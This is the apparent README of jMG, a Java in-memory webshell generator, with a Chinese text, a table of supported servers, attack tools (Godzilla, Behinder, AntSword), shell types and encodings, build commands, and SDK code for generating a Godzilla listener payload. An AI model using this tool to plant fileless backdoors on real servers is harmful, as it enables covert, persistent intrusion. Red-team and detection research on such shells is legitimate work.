java memshell generator
v1.0.6
一款支援高度自訂的Java 記憶體馬生成工具
Warning
本工具僅供安全研究和學習使用。使用者需自行承擔因使用此工具所產生的所有法律及相關責任。請確保你的行為符合當地的法律和規定。作者不承擔任何責任。如不接受,請勿使用此工具。
| 中介軟體 | 框架 | 工具(測試版本) | 內存馬類型 | 輸出格式 | 輔助模組 |
|---|---|---|---|---|---|
| Tomcat | SpringMVC | AntSword (2.1.15) | Listener | BASE64 | 專案漏洞封裝 |
| Resin | SpringWebFlux | Behinder (4.0.7) | Filter | BCEL | 表達式語句封裝 |
| WebLogic | Godzilla (4.0.1) | Interceptor | BIGINTEGER | ||
| Jetty | Neo-reGeorg (5.1.0) | HandlerMethod | CLASS | ||
| WebSphere | Suo5 (0.9.0) | TomcatValve | JAR | ||
| Undertow | Custom | JAR_AGENT | |||
| GlassFish | JS | ||||
| JSP |
maven (v3.9.3)
mvn package assembly:single
圖形化
java -jar ./releases/jmg-gui-1.0.8.jar
命令列
java -jar ./releases/jmg-cli-1.0.8.jar
Woodpecker 插件
將jmg-woodpecker-1.0.8.jar 加入到woodpecker 插件目錄
第三方庫(Maven)
1.將jmg-sdk-1.0.8.jar 安裝到本地maven 倉庫
mvn install:install-file -Dfile=./releases/jmg-sdk-1.0.8.jar -DgroupId=jmg -DartifactId=jmg-sdk -Dversion=1.0.8 -Dpackaging=jar
2.添加為依賴
<dependency> <groupId>jmg</groupId> <artifactId>jmg-sdk</artifactId> <version>1.0.8</version> </dependency>
3.範例
// 基础配置
AbstractConfig config = new AbstractConfig() {{
// 设置工具类型
setToolType(Constants.TOOL_GODZILLA);
// 设置中间件 or 框架
setServerType(Constants.SERVER_TOMCAT);
// 设置内存马类型
setShellType(Constants.SHELL_LISTENER);
// 设置输出格式为 BASE64
setOutputFormat(Constants.FORMAT_BASE64);
// 设置漏洞利用封装,默认不启用
setGadgetType(Constants.GADGET_NONE);
// 初始化基础配置
build();
}};
jMGenerator generator = new jMGenerator(config);
generator.genPayload();
generator.printPayload();
// 连接信息
SDKResultUtil.printBasicInfo(config);
SDKResultUtil.printDebugInfo(config);jMG v1.0.8
jMG v1.0.6
jMG v1.0.5
jMG v1.0.4
https://github.com/c0ny1
https://github.com/whwlsfb
https://github.com/feihong-cs/memShell
https://github.com/su18/MemoryShell
https://github.com/BeichenDream/GodzillaMemoryShellProject
MIT
